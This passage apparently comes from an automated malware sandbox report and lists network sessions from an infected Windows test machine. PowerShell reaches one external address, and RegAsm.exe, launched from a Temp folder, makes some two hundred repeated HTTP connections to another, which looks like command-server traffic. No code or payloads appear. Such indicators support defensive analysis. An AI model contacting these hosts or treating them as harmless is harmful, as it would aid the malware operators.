Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | | | 104.22.1.232 | A (IP address) | IN (0x0001) |
Jan 5, 2021 19:05:22.447736979 CET | 8.8.8.8 | 192.168.2.22 | 0x1175 | No error (0) | | | 83.172.144.37 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 83.172.144.37 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:05:22.500040054 CET | 70 | OUT | |
Jan 5, 2021 19:05:22.551645994 CET | 71 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:07.649980068 CET | 1143 | OUT | |
Jan 5, 2021 19:06:07.837934971 CET | 1143 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49177 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:11.296993017 CET | 1155 | OUT | |
Jan 5, 2021 19:06:11.461579084 CET | 1155 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
100 | 192.168.2.22 | 49267 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
101 | 192.168.2.22 | 49268 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
102 | 192.168.2.22 | 49269 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
103 | 192.168.2.22 | 49270 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
104 | 192.168.2.22 | 49271 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
105 | 192.168.2.22 | 49272 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
106 | 192.168.2.22 | 49273 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
107 | 192.168.2.22 | 49274 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
108 | 192.168.2.22 | 49275 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
109 | 192.168.2.22 | 49276 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
11 | 192.168.2.22 | 49178 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:11.686949968 CET | 1156 | OUT | |
Jan 5, 2021 19:06:11.871412992 CET | 1157 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
110 | 192.168.2.22 | 49277 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
111 | 192.168.2.22 | 49278 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
112 | 192.168.2.22 | 49279 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
113 | 192.168.2.22 | 49280 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
114 | 192.168.2.22 | 49281 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
115 | 192.168.2.22 | 49282 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
116 | 192.168.2.22 | 49283 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
117 | 192.168.2.22 | 49284 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
118 | 192.168.2.22 | 49285 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
119 | 192.168.2.22 | 49286 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
12 | 192.168.2.22 | 49179 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.075634003 CET | 1157 | OUT | |
Jan 5, 2021 19:06:12.243051052 CET | 1158 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
120 | 192.168.2.22 | 49287 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
121 | 192.168.2.22 | 49288 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
122 | 192.168.2.22 | 49289 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
123 | 192.168.2.22 | 49290 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
124 | 192.168.2.22 | 49291 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
125 | 192.168.2.22 | 49292 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
126 | 192.168.2.22 | 49293 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
127 | 192.168.2.22 | 49294 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
128 | 192.168.2.22 | 49295 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
129 | 192.168.2.22 | 49296 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
13 | 192.168.2.22 | 49180 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.449877024 CET | 1159 | OUT | |
Jan 5, 2021 19:06:12.609106064 CET | 1159 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
130 | 192.168.2.22 | 49297 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
131 | 192.168.2.22 | 49298 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
132 | 192.168.2.22 | 49299 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
133 | 192.168.2.22 | 49300 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
134 | 192.168.2.22 | 49301 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
135 | 192.168.2.22 | 49302 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
136 | 192.168.2.22 | 49303 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
137 | 192.168.2.22 | 49304 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
138 | 192.168.2.22 | 49305 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
139 | 192.168.2.22 | 49306 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
14 | 192.168.2.22 | 49181 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:12.832798958 CET | 1160 | OUT | |
Jan 5, 2021 19:06:12.987730980 CET | 1161 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
140 | 192.168.2.22 | 49307 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
141 | 192.168.2.22 | 49308 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
142 | 192.168.2.22 | 49309 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
143 | 192.168.2.22 | 49310 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
144 | 192.168.2.22 | 49311 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
145 | 192.168.2.22 | 49312 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
146 | 192.168.2.22 | 49313 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
147 | 192.168.2.22 | 49314 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
148 | 192.168.2.22 | 49315 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
149 | 192.168.2.22 | 49316 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
15 | 192.168.2.22 | 49182 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:13.213063955 CET | 1161 | OUT | |
Jan 5, 2021 19:06:13.388159037 CET | 1162 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
150 | 192.168.2.22 | 49317 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
151 | 192.168.2.22 | 49318 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
152 | 192.168.2.22 | 49319 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
153 | 192.168.2.22 | 49320 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
154 | 192.168.2.22 | 49321 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
155 | 192.168.2.22 | 49322 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
156 | 192.168.2.22 | 49323 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
157 | 192.168.2.22 | 49324 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
158 | 192.168.2.22 | 49325 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
159 | 192.168.2.22 | 49326 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
16 | 192.168.2.22 | 49183 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:13.606386900 CET | 1163 | OUT | |
Jan 5, 2021 19:06:13.778989077 CET | 1163 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
160 | 192.168.2.22 | 49327 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
161 | 192.168.2.22 | 49328 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
162 | 192.168.2.22 | 49329 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
163 | 192.168.2.22 | 49330 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
164 | 192.168.2.22 | 49331 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
165 | 192.168.2.22 | 49332 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
166 | 192.168.2.22 | 49333 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
167 | 192.168.2.22 | 49334 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
168 | 192.168.2.22 | 49335 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
169 | 192.168.2.22 | 49336 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
17 | 192.168.2.22 | 49184 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.002546072 CET | 1164 | OUT | |
Jan 5, 2021 19:06:14.168911934 CET | 1164 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
170 | 192.168.2.22 | 49337 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
171 | 192.168.2.22 | 49338 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
172 | 192.168.2.22 | 49339 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
173 | 192.168.2.22 | 49340 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
174 | 192.168.2.22 | 49341 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
175 | 192.168.2.22 | 49342 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
176 | 192.168.2.22 | 49343 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
177 | 192.168.2.22 | 49344 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
178 | 192.168.2.22 | 49345 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
179 | 192.168.2.22 | 49346 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
18 | 192.168.2.22 | 49185 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.391398907 CET | 1165 | OUT | |
Jan 5, 2021 19:06:14.558085918 CET | 1166 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
180 | 192.168.2.22 | 49347 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
181 | 192.168.2.22 | 49348 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
182 | 192.168.2.22 | 49349 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
183 | 192.168.2.22 | 49350 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
184 | 192.168.2.22 | 49351 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
185 | 192.168.2.22 | 49352 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
186 | 192.168.2.22 | 49353 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
187 | 192.168.2.22 | 49354 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
188 | 192.168.2.22 | 49355 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
189 | 192.168.2.22 | 49356 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
19 | 192.168.2.22 | 49186 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:14.788464069 CET | 1166 | OUT | |
Jan 5, 2021 19:06:14.954180002 CET | 1167 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
190 | 192.168.2.22 | 49357 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
191 | 192.168.2.22 | 49358 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
192 | 192.168.2.22 | 49359 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.163208961 CET | 1144 | OUT | |
Jan 5, 2021 19:06:08.331588984 CET | 1145 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
20 | 192.168.2.22 | 49187 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.165872097 CET | 1168 | OUT | |
Jan 5, 2021 19:06:15.352806091 CET | 1168 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
21 | 192.168.2.22 | 49188 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.552401066 CET | 1169 | OUT | |
Jan 5, 2021 19:06:15.734059095 CET | 1170 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
22 | 192.168.2.22 | 49189 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.960354090 CET | 1170 | OUT | |
Jan 5, 2021 19:06:16.139384985 CET | 1171 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
